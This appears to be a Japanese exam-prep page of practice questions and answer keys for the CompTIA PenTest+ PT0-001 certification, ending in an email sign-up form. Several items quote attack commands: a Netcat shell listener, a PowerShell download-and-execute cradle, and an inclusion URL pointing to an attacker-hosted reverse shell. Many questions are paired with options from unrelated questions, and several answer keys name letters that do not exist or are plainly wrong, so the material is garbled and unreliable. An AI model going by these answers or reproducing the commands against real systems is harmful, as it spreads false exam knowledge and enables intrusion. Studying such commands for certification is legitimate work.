すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

効果的な準備のための最新のCompTIA PenTest+PT0-001試験問題集

CompTIA PenTest+のPT0-001試験の準備をし、効果的な学習教材が必要ですか。心配しないでください!弊社の包括的な試験問題集は精確に実際試験の範囲を絞ります。弊社の模擬試験はあなたの準備のための重要な部分です。模擬試験を通じて、自分の知識を評価し、改善すべき点を見つけ、合格に必要なスキルを身につけることができます。当社の専門家が監修した学習教材と模擬試験で、侵入テストの概念、ツール、およびテクニックを深く理解することができます。経験豊富なプロフェッショナルであっても、サイバーセキュリティの道を歩み始めたばかりであっても、当社のリソースはあなたのニーズを満たし、試験当日の成功を確実にするよう調整されています。
他のオンライン試験を受ける

質問 #1
ペネトレーションテスト契約における次の特性のうち、本番システムを最も高い負荷で観察し、テストする上で、最も大きな影響を与えるものはどれか。
A. 重要な生産システムのスコープを作成する
B. テストアクセス時間のスケジュール設定
C. ホワイトボックス・テストへの取り組みを確立する
D. 経営陣が押し付けがましいテストに同意すること
回答を見る
正解: B
質問 #2
次のシナリオのうち、テスターがKerberoasting攻撃を実行するのはどれですか?
A. テスト者は Windows デバイスを侵害し、LSA 秘密をダンプした。
B. テスターはSAMデータベースを取得し、パスワードハッシュをクラックする必要がある。
C. テスト者は限定特権ユーザーを侵害し、他のアカウントをターゲットにして横の動きをする必要があります。
D. テスト者はアカウントを侵害し、システムからハッシュと平文パスワードをダンプする必要があります。
回答を見る
正解: C
質問 #3
ある侵入テスト実施者が API テストを実施する準備をしている。この任務の準備に最も役立つのはどれか。
A. ニクト
B. WAR
C. W3AF
D. スワッガー
回答を見る
正解: D
質問 #4
何度か試行した後、攻撃者は悪用されることなく、攻撃者の実際の指紋を使って生体認証センサーから不正アクセスを行うことができました。次のうち、最も可能性の高い説明はどれですか?
A. バイオメトリック・デバイスは、より偽陽性向けに調整されている。
B. バイオメトリック装置は、より真陰性向けに構成されている。
C. 生体認証装置がフェイルクローズに設定されている。
D. 生体認証デバイスが有効なユーザーの指紋を複製した。
回答を見る
正解: A
質問 #5
脆弱性スキャンによって、SSL証明書がホスト名と一致しないことが判明しました。ペネトレーションテスターが調査結果の妥当性を判断するために実行できる技法はどれか。
A. スキャナがアウトバウンドDNS要求を行えることを確認する。
B. スキャナがARP解決を実行するように構成されていることを確認する。
C. スキャナがIPホストを分析するように構成されていることを確認する。
D. スキャナに適切なプラグインがロードされていることを確認してください。
回答を見る
正解: A
質問 #6
次のシナリオのうち、テスターがKerberoasting攻撃を実行するのはどれですか?
A. テスターがWindowsデバイスに侵入し、LSAシークレットをダンプした。
B. テスターはSAMデータベースを取得し、パスワードハッシュをクラックする必要がある。
C. テスト者は限定特権ユーザーを侵害し、他のアカウントをターゲットにして横移動する必要がある。
D. テスト者はアカウントを侵害し、システムからハッシュとプレーンテキストのパスワードをダンプする必要がある。
回答を見る
正解: C
質問 #7
ある侵入テスト実施者が、IPアドレスのリストを含む会社提供のテキストファイルを使用して、NmapでOSのフィンガリングを実施するよう依頼された。このスキャンを実施するために必要なものはどれか(2つ選びなさい)。
A. ディレクトリトラバーサル
B. クロスサイトスクリプティング
C. リモートファイルインクルード
D. ユーザー列挙
回答を見る
正解: BE
質問 #8
あるセキュリティコンサルタントが、以前に特定されたユーザーアカウントでデバイスを攻撃しようとしています。
A. arpspoof -c both -r -t 192
B. arpspoof -t 192
C. arpspoof -c both -t 192
D. arpspoof -r -t 192
回答を見る
正解: D
質問 #9
このスクリプトの目的を最もよく表しているのはどれか。
A. ログ収集
B. イベント・コレクション
C. キーストローク監視
D. デバッグメッセージコレクション
回答を見る
正解: C
質問 #10
ある企業が、毎年恒例のペネトレーション・テストを実施した。いくつかの新しい発見事項に加えて、以前に特定された発見事項のすべてが最新のレポートでも残っていました。最も可能性の高い理由は次のうちどれですか?
A. インフラは同様のハードウェアとソフトウェアに置き換えられている。
B. システム管理者が間違ったパッチを適用している。
C. 組織は、特定された指摘事項を是正するための措置を講じていない。
D. 侵入テストツールの設定が誤っていた。
回答を見る
正解: C
質問 #11
ある侵入テスト者がホストに侵入しました。デバイス上にNetcatリスナーを作成するための正しい構文はどれですか?
A. nc -lvp 4444 /bin/bash
B. nc -vp 4444 /bin/bash
C. nc -p 4444 /bin/bash
D. nc -lp 4444 -e /bin/bash
回答を見る
正解: A
質問 #12
限られた権限のWindowsシステムで永続性を維持しようとするとき、テスト担当者は次のレジストリキーのどれを使うべきか。
A. hkey_classes_root
B. hkey_local_machine
C. hkey_current_user
D. hkey_current_config
回答を見る
正解: C
質問 #13
ある侵入テスト実施者が、公開ウェブ・サーバ上で複数の高番号のポートがリッスンしていることを観察する。しかし、システム所有者は、アプリケーションはポート443しか使用していないと言います。次のうちどれを推奨するのがベストでしょうか?
A. アプリケーションを別のポートに移行する。
B. ポート443を特定のIPアドレスにフィルタリングする。
C. Webアプリケーションファイアウォールを導入する
D. 不要なサービスを無効にする。
回答を見る
正解: D
質問 #14
アセッサーが Windows ドメイン internal.comptia.net の内部セキュリティテストを開始する。評価者にはDHCP経由のネットワークアクセスが与えられていますが、ネットワークマップやターゲットIPアドレスは与えられていません。評価者は次のコマンドのどれを使用して、可能性の高いWindowsドメインコントローラを見つけることができますか?
A. アプリケーションのフレームワークをエスケープするためにパスを変更する。
B. アプリケーションに重なるフレームを作成する。
C. JavaScriptを含む悪意のあるiframeを注入する。
D. 悪意のあるiframe属性を渡す。
回答を見る
正解: A
質問 #15
ある内部ネットワーク侵入テストにおいて、テスト実施者は、ターゲットとなる複数のシステムで完全な管理者権限を持つことが判明しているユーザの NTLM パスワードハッシュを復元した。このハッシュをクラックし、平文のパスワードを回復するための努力は失敗に終わっている。
A. オペレーティングシステムWindows 7オープンポート23, 161
B. オペレーティングシステムWindows Server 2016オープンポート53, 5900
C. オペレーティングシステムWindows 8
D. オペレーティングシステムWindows 8オープンポート514, 3389
回答を見る
正解: C
質問 #16
ある侵入テスト実施者が、ターゲットシステムに対して複数の脆弱性スキャンを実行した。次のうち、クレデンシャルスキャンに特有のものはどれか。
A. 発見された脆弱性に対するエクスプロイト
B. 詳細なサービス構成
C. パッチが適用されていないサードパーティ製ソフトウェア
D. 脆弱なアクセス制御設定
回答を見る
正解: A
質問 #17
ある会社は、会社の DMZ に存在するアプリケーションの評価を実施するために、侵入テスト実施者を雇いました。テストを実施する前に、侵入テスト実施者の IP アドレスをホワイトリストに登録する必要があるのは、次のどのソリュー ションですか?
A. WAF
B. HIDS
C. 防衛研究所
D. DLP
回答を見る
正解: C
質問 #18
あるコンサルタントが、特定されたデバイス上のすべてのTCPポートをスキャンしたいと考えています。このタスクを完了するNmapスイッチは、次のうちどれですか。
A. p
B. -P ALL
C. -P 1-65534
D. -ポート 1-65534
回答を見る
正解: A
質問 #19
シミュレーションあなたは侵入テスト実施者で、サーバーのポートスキャンを実施している。インストラクションPart1:出力が与えられたら、利用可能なオプションからこの出力を生成するために使用されたコマンドを構築しなさい:コマンドを適切に構築したら、与えられた出力を使用して、さらに調査すべき潜在的な攻撃ベクトルを特定する。シミュレーションの初期状態に戻したい場合は、いつでも、[すべてリセット]ボタンをクリックしてください。
A. 答えは解説セクションを参照。
回答を見る
正解: A
質問 #20
ある侵入テスト実施者がコードレビューを行っている。実施されているテスト技法はどれか。
A. 動的解析
B. ファジング解析
C. 静的解析
D. ランタイム分析
回答を見る
正解: C
質問 #21
Linuxシステムに低特権で初期アクセスした後、侵入テスト実施者は、あるユーザーのホーム・フォルダーにある「changepass」というタイトルの興味深いバイナリーを特定する。"-sr-xr-x 1 root root 6443 Oct 18 2017/home/user/changepass「strings」を使用して、changepassからASCII印刷可能な文字を印刷すると、テスト担当者は次のようになります。
A. changepassを書き込み可能なディレクトリにコピーし、ENV_PATH環境変数をchangepwというタイトルのトークン盗みバイナリのパスにエクスポートする。そして changepass を実行する。
B. 同じディレクトリにchangepassのコピーを作成し、名前をchangepwとする。環境変数 ENV_PATH をパス '/home/user/' にエクスポートします。それから changepass を実行する。
C. 環境変数ENV_PATHを、changepwというタイトルのトークン盗みバイナリを含む書き込み可能なディレクトリのパスにエクスポートする。そしてchangepassを実行する。
D. 環境変数ENV_PATHを'/usr/local/bin'のパスにエクスポートした後、カレントディレクトリ内でsudoを使ってchangepassを実行する。
回答を見る
正解: D
質問 #22
ある医療機関は、対象となる個人の個人健康情報を保護し、その保護を証明するために、地域の規制に従わなければならない。ペネトレーションテスターがアセスメントを実施する際に特にテストすべき条件はどれか。(2つ選択)。
A. 重役を狙ったSMS攻撃
B. 特定のチームを狙ったメール攻撃
C. USBキードロップで無作為のユーザーを狙う
D. 水飲み場攻撃で組織を狙う
回答を見る
正解: DE
質問 #23
静的なHTMLウェブページ上で自動スキャナによって報告された場合、誤検出となる可能性が最も高い脆弱性はどれか。(2つ選んでください)
A. 安全でないサービスとプロトコル設定
B. SMBとSMTPサービスの実行
C. パスワードの複雑さとユーザーアカウントの脆弱性
D. 設定ミス
回答を見る
正解: FG
質問 #24
次のPowerShellコマンドを考えてみましょう。powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet このコマンドによって実行されるアクションを説明するBESTはどれですか?
A. 実行ポリシーを設定します。
B. リモートスクリプトを実行する。
C. エンコードされたコマンドを実行する。
D. オブジェクトをインスタンス化する。
回答を見る
正解: B
質問 #25
最近のペネトレーションテストの結果、ある会社は従業員による辞書的パスワードと季節的パスワードの使用に関する指摘を受けた。一般的な辞書用語の使用を是正するためのコントロールとして、最も適切なものはどれか。
A. パスワードの長さを7文字から14文字に拡張する。
B. パスワード履歴の制限を実施する。
C. パスワードフィルターを設定する
D. 5回失敗したらアカウントを無効にする。
E. パスワードの有効期限を短くする。
回答を見る
正解: A
質問 #26
ある攻撃者が、SET を使用して、ある企業のクラウドでホストされている Web メールポータルのコピーを作成し、最高経営責任者(CEO)がログインすることを期待して電子メールを送信し、CEO のログイン認証情報を取得します。これは、次のどのタイプの攻撃の例ですか?
A. エリシテーション攻撃
B. なりすまし攻撃
C. スピアフィッシング攻撃
D. ドライブバイダウンロード攻撃
回答を見る
正解: A
質問 #27
あるセキュリティアナリストがWAFのログを監視していたところ、次のURLに対する攻撃が成功していることを発見した。https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.phpWhich、この種の攻撃を防ぐために、次の是正措置のうちどれをとるべきか。
A. ブラックリストを導入する。
B. URLリダイレクトをブロックする。
C. パラメータをダブルURLエンコードする。
D. アプリケーションからの外部呼び出しを停止する。
回答を見る
正解: B
質問 #28
あるソフトウェア開発チームが最近、オンプレミス環境の新しいアプリケーション・ソフトウェアに移行した。侵入テストの結果、複数の脆弱性が存在することがわかった。ペネトレーションテスト実施者がライブ環境またはテスト環境にアクセスできない場合、VM上に同じ環境を作成してテストを実施する方がよいかもしれません。次のうち、確認のために最も重要なものはどれですか?
A. hashcat -m 5600 -r rules/bestG4
B. hashcat -m 5600 hash
C. hashcat -m 5600 -a 3 hash
D. hashcat -m 5600 -o results
回答を見る
正解: A
質問 #29
ある侵入テスト実施者は、インフラ面を完了した後、ターゲット企業のスタッフに対して OSINT を実施する必要があります。次のうち、侵入のための最良のステップはどれか。
A. 会社に電話をかけ、ソーシャル・エンジニアリングのテクニックを使ってスタッフの情報を入手する。
B. クライアントを訪問し、スタッフから情報を得るためになりすます。
C. 職員になりすましたメールを送り、職員が機密情報を返信するかどうかを確認する。
D. SNSなど、スタッフの情報をインターネットで検索する。
回答を見る
正解: D
質問 #30
ある侵入テスト実施者が、脆弱性スキャンを実施する前に、いくつかのリモートホストで初期情報収集を実施している。テスト実施者は次のコマンドを実行する:nmap -D 192.168.1.1、192.168.1.2、192.168.1.3 -sV -o --max-rate 2 192.168.1.130複数のIPアドレスが指定される理由を説明するBESTはどれか。
A. ネットワークはa/25以上のサブネットで構成されており、テスターは2つの異なるサブネット上のホストにアクセスする必要があった。
B. テスターは、いくつかの偽のアドレスを含めることで、よりステルス性の高いスキャンを実行しようとしている。
C. スキャンマシンには、指定されたレートでスキャン要求のバランスをとるための複数のインターフェイスがある。
D. 最初のアドレスセットに対してディスカバリースキャンが実行され、後者のホストに対してはより深く、より攻撃的なスキャンが実行される。
回答を見る
正解: B
質問 #31
侵入テスト担当者が、WPA2-PSKで保護されたワイヤレスネットワークを監視して、クライアントとアクセスポイント間のハンドシェイクをキャプチャしようとしている。テスターは、識別されたネットワークの正しいチャネルを監視していますが、ハンドシェイクをキャプチャすることに成功していません。このシナリオを考えると、テスト者がこのハンドシェイクを取得するのに役立つ攻撃は、次のうちどれがBESTでしょうか?
A. カルマ攻撃
B. 認証解除攻撃
C. フラグメンテーション攻撃
D. SSDI放送の洪水
回答を見る
正解: B
質問 #32
ある侵入テスト実施者が、あるアプリケーションがインターネットに面したアプリケーションで基本認証しか利用していないと報告しました。次のうち、最も適切な改善策はどれか。
A. HTTPストリクト・トランスポート・セキュリティを有効にする。
B. 安全なクッキーフラグを有効にする。
C. 通信路を暗号化する。
D. 無効なユーザー入力をサニタイズする。
回答を見る
正解: A
質問 #33
ある侵入テスト者が、ある組織の認証サーバの脆弱性の悪用に成功し、今度はリバースシェルを設定しようとしている。侵入テスト担当者は、ターゲット上でNetcatが利用できないことを発見しました。NEXTを試みるための適切な選択肢は次のうちどれですか?
A. xtermを実行し、ターゲットのXサーバーに接続する。
B. 権限の昇格を試み、対話型シェルを取得する。
C. /dev/tcpソケットを使ってみる。
D. etc/shadowを読み出そうとする。
回答を見る
正解: C
質問 #34
スタッフの若手技術者が侵入テストを実施した。テスト中、その技術者は、Web アプリケーションがユーザアカウントとパスワード情報の SQL テーブルを開示していることを発見しました。この発見とその重要性を管理者に通知する最も効果的な方法はどれか。
A. エグゼクティブサマリー、推奨事項、およびウェブアプリケーション開示のスクリーンショットを用いて、調査結果を文書化する。
B. この情報を使ってSQLサーバーに接続し、1つか2つの重要でないアカウントのパスワードを変更して、管理者に概念実証を示す。
C. 開発チームに発見を通知し、専門の侵入テスト会社に入力検証を実施するよう提案する。
D. 経営陣に対し、プロの侵入テスト会社と正式な契約を開始するためのRFPを作成するよう要請する。
回答を見る
正解: A
質問 #35
DRAG DROPAマネージャは、以下のPythonスクリプト内の問題の診断を支援するよう、テスターに呼びかけます:#!/usr/bin/pythons = "Administrator "テスターは、文字列のスライスと操作の問題ではないかと疑っています。以下のコードセグメントを分析し、各文字列操作の正しい出力を対応するコードセグメントにドラッグ&ドロップしてください。オプションは一度だけ使うことも、まったく使わないこともできる:
A. 答えは解説セクションを参照。
回答を見る
正解: A
質問 #36
あるセキュリティ・アナリストは、組織の DMZ 環境に対して実行された詳細な侵入レポートを提供された。レポートには、ある発見が CVSS ベーススコア 10.0 であることが記載されていました。この脆弱性を悪用するために必要な難易度は、次のうちどれでしょうか?
A. 非常に難しい。境界システムは通常ファイアウォールの背後にある。
B. やや難しい。利用するにはかなりの処理能力を必要とする。
C. 些細なこと。この発見を利用するために必要な労力はほとんどない。
D. 不可能。外部ホストは攻撃から保護するためにハード化されている。
回答を見る
正解: C
質問 #37
ブラックボックス侵入テスト戦略は、テスト実施者に以下を提供する:
A. ターゲットリスト
B. ネットワーク図
C. ソースコード
D. 特権クレデンシャル
回答を見る
正解: D
質問 #38
侵入テスト者は、IT部門のメンバーをフィッシングすることで、最初のVPNユーザー・ドメインの認証情報を取得することができた。その後、侵入テスト者は VPN 経由でハッシュを取得し、辞書攻撃を使用して簡単にクラックしました。次のうち、どの修復ステップを推奨すべきか。(3つを選択)。
A. ハードウェアベンダー
B. チャンネル干渉
C. ユーザー名
D. 主な強み
回答を見る
正解: BCG
質問 #39
次のうち、企業方針の抜粋はどれでしょう?
A. 従業員のパスワードは、最低8文字、うち1文字は英数字でなければならない。
B. ヘルプデスク(800-passwd1)では、パスワードのリセットを行っています。
C. 従業員は、企業資産にアクセスする際に強力なパスワードを使用しなければならない。
D. 企業システムは、MD5 ハッシュアルゴリズムを使用してパスワードを保存する必要があります。
回答を見る
正解: D
質問 #40
ある侵入テスト実施者が、マーケティング担当社員のデバイスにアクセスした。侵入テスト者は、アクセスが発見された場合に、デバイスの制御を回復できるようにしたいと考えています。侵入テスト者は、デバイスへの永続性を維持するために、次のどのアクションを使用する必要がありますか?(2つ選択してください)。
A. ヒドラ
B. 切り裂きジョン
C. ハッシュキャット
D. ピーチ
回答を見る
正解: AC
質問 #41
婚約を計画する際に最も重要なのは次のうちどれですか?(2つ選んでください)。
A. ポートスキャンを実行します。
B. ウェブサーバーのバナーをつかむ。
C. TTYをリモートシステムにリダイレクトします。
D. 提供されたIPのエラーログを削除します。
回答を見る
正解: AC
質問 #42
ある侵入テスト実施者が、サーバーファームが会社のソフトウェアベースラインに準拠しているかどうかを判断するためにリモートスキャンを実施しています。ベースラインへの準拠を確認するために、侵入テスト担当者が実行すべきことは次のうちどれですか。
A. ディスカバリー・スキャン
B. ステルススキャン
C. フルスキャン
D. クレデンシャルスキャン
回答を見る
正解: A
質問 #43
ある侵入テスト実施者が、ウェブアプリケーションの脆弱性スキャンレポートをクライアントに提出します。侵入テスト実施者は、ある脆弱性を中程度の重大度と評価します。同じ脆弱性が、前回のレポートでは重大度「クリティカル」として報告されました。深刻度が下がった理由として最も可能性が高いのは次のうちどれですか?
A. バージョンを更新せずにホットフィックスを適用した。
B. 脅威の状況は大きく変わった。
C. クライアントが新機能を追加してコードベースを更新した。
D. 現在のところ、この脆弱性に対する悪用は知られていない。
回答を見る
正解: A
質問 #44
ペネトレーション・テスターであるJoeは、会社のオフィスにアクセスすることで、会社の物理的セキュリ ティを評価するよう依頼された。Joeは、営業時間中または従業員がいないときに建物に入ることができる方法を探している。これを達成するのに最も効果的なのは、次のうちどれでしょうか?
A. バッジクローン
B. ピッキング
C. テールゲート
D. ピギーバッキング
回答を見る
正解: A
質問 #45
ある侵入テスト者が、別のネットワーク上の新しいLinuxデバイスにピボットを実行した。テスト者は次のコマンドを書きます:for m in {1..254..1};do ping -c 1 192.168.101.$m; doneこのコマンドを実行した結果を表す最も適切なものはどれですか?
A. ポートスキャン
B. サービス列挙
C. ライブホストの識別
D. サービス拒否
回答を見る
正解: C
質問 #46
あるコンサルタントが、クライアントに対してソーシャル・エンジニアリン グ攻撃を行っている。そのコンサルタントは、フィッシングキャンペーンを使って、多くのユーザ名とパスワードを収集することができた。コンサルタントには、様々な従業員の電子メールアカウントにログオンするための認証情報が与えられている。調査結果を踏まえて、コンサルタントが実施することを推奨するのは次のうちどれですか?
A. 強力なパスワードポリシー
B. パスワードの暗号化
C. 電子メールシステムのハードニング
D. 二要素認証
回答を見る
正解: D
質問 #47
次のうち、セキュリティ評価の予算に直接的かつ重大な影響を与えるものはどれか。
A. スコーピング
B. スケジューリング
C. コンプライアンス要件
D. ターゲット・リスク
回答を見る
正解: D
質問 #48
あるペネトレーション・テスターが、ある新興企業のセキュリティ評価を行った。レポートには、合計 10 件の脆弱性がリストアップされており、そのうち 5 件が「クリティカル(critical)」であると特定されています。クライアントには、すべての脆弱性を直ちに修正するリソースがありません。このような状況では、次のうちどれがクライアントにとって最良の提案でしょうか?
A. 永続性を削除するには
B. 永続性を有効にする
C. 持続性を報告する
D. 持続性をチェックする
回答を見る
正解: D
質問 #49
ある侵入テスト実施者が、ウェブアプリケーションの脆弱性スキャンレポートをクライアントに提出します。侵入テスト実施者は、ある脆弱性を中程度の重大度と評価します。同じ脆弱性が、前回のレポートでは重大度「クリティカル」として報告されました。深刻度が下がった理由として最も可能性が高いのは次のうちどれですか?
A. バージョンを更新せずにホットフィックスを適用してしまった。
B. 脅威の状況は大きく変化している。
C. クライアントがコードベースに新機能を追加した。
D. 現在のところ、この脆弱性に対する悪用は知られていない。
回答を見る
正解: A
質問 #50
ある侵入テスト実施者が、ある企業の外部侵入評価を実施することになりました。次のステップのうち、受動的情報収集プロセスに最も役立つのはどれですか。(2つ選んでください)。
A. スクリプト・キディーズ
B. APT出演者
C. インサイダーの脅威
D. ハクティビスト・グループ
回答を見る
正解: DE
質問 #51
ある侵入テスト実施者が、SQL インジェクションコマンドをテキストボックスに入力し、データベース上の情報ストアにアクセスすることができました。この脆弱性を緩和するための推奨事項として、最も適切なものはどれか。
A. ログインに使用する認証情報をランダムにする。
B. ホストベースの侵入検知をインストールする。
C. 入力の正規化を行う。
D. システムハードニングを実行する。
回答を見る
正解: D
質問 #52
次のうち、企業方針の抜粋はどれでしょう?
A. 従業員のパスワードは、最低8文字、うち1文字は英数字でなければならない。
B. ヘルプデスク(800-passwd1)でパスワードのリセットを行います。
C. 従業員は、企業の資産にアクセスする際に強力なパスワードを使用しなければならない。
D. 企業システムは、MD5ハッシュアルゴリズムを使ってパスワードを保存しなければならない。
回答を見る
正解: D
質問 #53
ある侵入テスト者が銀行アプリケーションをテストしていて、脆弱性を発見した。テスト者は、いかなるデータにもアクセスできないはずの非特権ユーザとしてログインしています。ウェブ傍受プロキシからの以下のデータが与えられたとき、次のどのタイプの脆弱性が悪用されていますか?
A. 強制ブラウジングの脆弱性
B. パラメータ汚染の脆弱性
C. ファイルアップロードの脆弱性
D. クッキー列挙
回答を見る
正解: D
質問 #54
悪意のあるユーザがコンピュータにMITM攻撃を仕掛けようとしています。IP:192.168.1.20NETMASK:255.255.255.0デフォルトゲートウェイ:192.168.1.254DHCP:192.168.1.253DNS:192.168.10.10、192.168.20.10悪意のあるユーザーがMITM攻撃を実行するために実行すべきコマンドはどれか。
A. ホワイトリストは、IPSとそれをサポートするログ監視システムに対する不用意なDoS攻撃の可能性を防ぎます。
B. サードパーティのIPSシステムの侵入テストでは、追加の文書や承認が必要になることが多く、一刻を争うテストを遅らせる可能性がある。
C. IPSのホワイトリスト・ルールは、常に最新の状態に保つために頻繁な更新が必要であり、常に脆弱性が開発され、新たに弱点が発見される。
D. テストは、IPS のような能動的な防御の相対的な有効性を判定することではなく、対象範囲内の全システムにわたって、可能性のあるセキュリティ問題を発見することに重点を置くべきである。
回答を見る
正解: B
質問 #55
侵入テスト者は、ドメインコントローラへのフルシェルを持っており、21日間にドメインに認証されていないユーザーアカウントを発見したい。次のコマンドのどれが最もよくこれを達成するか?
A. dsrm -users "DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
回答を見る
正解: D
質問 #56
物理的なセキュリティ評価中に「アンダー・ザ・ドアー・ツール」を使用することは、次のどのタイプの侵入テクニックの例ですか?
A. 影響を受けるサービスのネットワークポートを無効にする。
B. すべての調査結果をまとめ、クライアントに提出する。
C. 所見の詳細をクライアントに速やかに警告する。
D. 攻撃者に悪用されないように、ターゲットをオフラインにする。
回答を見る
正解: D
質問 #57
あるクライアントが侵入テスト実施者に、現在進行中のテストにさらにアドレスを追加するよう依頼しました。ターゲットリストを定義するのは次のうちどれですか。
A. 交戦規定
B. メーテル・サービス契約
C. 作業明細書
D. エンドユーザーライセンス契約
回答を見る
正解: C
質問 #58
ある侵入テスト者が、アウトバウンドポートでリッスンしているように見えるDMZサーバーの悪用に成功した。侵入テスト者は、そのトラフィックをあるデバイスに転送したい。この目的のために使用する最良のツールはどれか。(2つ選んでください)。
A. dig -q any _kerberos
A. net
B. dig -q any _lanman
A. net
C. dig -q any _ntlm
A. net
D. dig -q any _smtp
A. net
回答を見る
正解: BD
質問 #59
ある侵入テスト実施者は、IPアドレスのリストを含む会社提供のテキストファイルを使用して、NmapでOSのフィンガリングを実施するよう依頼された。このスキャンを実施するために必要なものはどれか。
A. ゼロデイ・エクスプロイトを実行する。
B. 既知のパスワードで新しいドメインユーザーを作成する。
C. 既知のブートタイムサービスを修正して、コールバックをインスタンス化する。
D. 侵害されたユーザーの平文資格情報を取得する。
回答を見る
正解: AB
質問 #60
ある侵入テスト実施者は、外部の脆弱性スキャン中に次のような発見をした。上記のスキャン結果から、優先すべき攻撃戦略はどれか。
A. 付録
B. エグゼクティブ・サマリー
C. テクニカル・サマリー
D. 本体
回答を見る
正解: D
質問 #61
消費者ベースのIoTデバイスは、従来のデスクトップコンピュータ用に構築されたシステムよりも安全性が低いことが多い。その理由を最もよく表しているのは次のうちどれでしょうか?
A. msfコンソール
B. ワークスペース
C. msfvenom
D. db_init
E. db_connect
回答を見る
正解: A
質問 #62
DRAG DROP以下の各パスワードを、最も複雑でないもの(1)から最も複雑なもの(4)の順に、文字セットに基づいて配置してください。各パスワードは1回のみ使用できます:
A. 答えは解説セクションを参照。
回答を見る
正解: A
質問 #63
あるクライアントが、企業秘密を狙う遠隔地の攻撃者に侵入される企業の数を懸念しています。この場合、どのような敵対者が考えられるか、次のうち最も適切なものはどれですか?
A. アプリケーションをダイナミックコードアナライザで実行する。
B. ファジングユーティリティを使用する。
C. アプリケーションをデコンパイルする。
D. メモリ割り当てをチェックする。
回答を見る
正解: B
質問 #64
あるエネルギー会社が、発電と冷房を管理するために ICS を採用している発電所の侵入テストを実施するよう、セキュ リティ会社に委託した。このような環境特有の考慮事項として、セキュリティ会社がアセスメントの準備の際に行わなければならないものはどれか。
A. 適切なセキュリティテストツールを選択する
B. ICSコンポーネントの電流定格と負荷定格
C. 潜在的な操業上および安全上の危険
D. 試験に使用するハードウェアの電気的認証
回答を見る
正解: A
質問 #65
あるクライアントが無線侵入テストを予定しています。テストを開始する前に最も必要と思われるスコープ対象情報は、次のうちどれですか。
A. テストする物理的な場所とネットワークESSID
B. クライアントが所有するワイヤレスデバイスの数
C. クライアントの優先無線アクセスポイントベンダー
D. クライアントのデバイスが使用するバンドと周波数
回答を見る
正解: D
質問 #66
侵入テスト者のJoeは、基本的なアカウント認証情報を受け取り、Windowsシステムにログインした。権限をエスカレートするために、彼は次のどの場所からMimikatzを使って認証情報を引き出しますか?
A. ユーザーとグループを列挙する
A. RIDサイクリング
B. 認証情報をリレーするためにハッシュを渡す
C. パスワード総当たりによるホストへのログイン
D. システムアカウントになりすますセッションハイジャック
回答を見る
正解: C
質問 #67
ある企業のセキュリティ・アセスメントを実施した後、クライアントのテスト環境が利用できなかった時間について、クライアントが請求を受けていたことが判明した。クライアントは、不当に請求されたと主張しています。このような状況において、指針を示すことができる可能性が最も高い文書は、次のうちどれでしょうか?
A. 追加料金
B. 会社の方針
C. 衝撃耐性
D. 業種
回答を見る
正解: D

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: